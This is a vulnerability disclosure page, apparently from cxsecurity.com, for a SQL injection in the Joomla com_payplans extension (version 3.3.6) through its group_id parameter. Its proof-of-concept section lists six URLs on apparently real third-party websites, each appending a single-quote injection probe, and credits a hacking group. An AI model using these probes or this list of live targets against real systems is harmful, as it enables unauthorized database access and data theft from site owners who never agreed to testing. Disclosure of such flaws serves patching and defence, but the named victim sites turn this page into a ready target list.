Joomla com_payplans - SQL Injection

2016.06.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Joomla com_payplans - SQL Injection # Exploit Author : Persian Hack Team # Vendor Homepage : http://extensions.joomla.org/extension/payplans # Category: [ Webapps ] # Tested on: [ Win ] # Version: 3.3.6 # Date: 2016/06/08 ###################### # # PoC: # group_id Parameter Vulnerable To SQL # Demo : # http://www.cittanuvola.com/index.php?option=com_payplans&group_id=4%27 # http://www.gifa.org.za/index.php?option=com_payplans&view=plan&task=subscribe&group_id=1%27 # http://www.sigef.net/index.php?option=com_payplans&view=plan&task=subscribe&group_id=1%27 # http://australianteachers.com.au/index.php?option=com_payplans&group_id=1%27 # http://www.centralvalleysom.org/index.php?option=com_payplans&view=plan&task=subscribe&group_id=6%27 # http://powermail4joomla.com/index.php?option=com_payplans&group_id=5%27 # Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk ###################### # Discovered by : Mojtaba MobhaM # Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : persian-team.ir #####################

References:

https://www.youtube.com/watch?v=Y5mpM0IBlUk


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top